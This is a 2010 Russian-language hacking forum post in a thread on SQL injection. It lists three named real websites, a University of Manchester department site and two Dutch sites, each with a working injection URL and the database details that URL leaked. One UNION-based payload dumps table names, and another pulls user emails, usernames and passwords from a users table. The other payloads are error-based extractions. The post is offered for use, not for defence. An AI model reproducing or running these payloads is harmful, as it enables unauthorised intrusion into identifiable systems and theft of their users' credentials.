Тема: SQL Инъекции
Показать сообщение отдельно

  #2  
Старый 14.05.2010, 22:25
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами: 8762549

Репутация: 1069


По умолчанию
Сайт: http://www.seaes.manchester.ac.uk
ТИЦ: 20
PR: 7
Примеры запросов:
Код:
http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_concat(0x0b,table_name),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables--+  

http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+all+select+1,group_concat(0x0b,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_concat(0x0b,user_name,0x3a,user_password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+cpg132_users--+
version - 5.1.34-1-log
user - earthadmuser@abel.mc.man.ac.uk
database - earthadm
os - debian-linux-gnu

==========================================

Сайт: http://www.beoordeelmijnleraar.nl
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.beoordeelmijnleraar.nl/sub.php?groupID=5&userID=4&ID=9999+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bml@localhost
database - bml
os - pc-linux-gnu

==========================================

Сайт: http://www.donkervoorttouringclub.nl
ТИЦ: 10
PR: 2
Пример запроса:
Код:
http://www.donkervoorttouringclub.nl/splace/f.php?ID=11335+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - dtc_splace@localhost
database - dtc_splace
os - pc-linux-gnu
 
Ответить с цитированием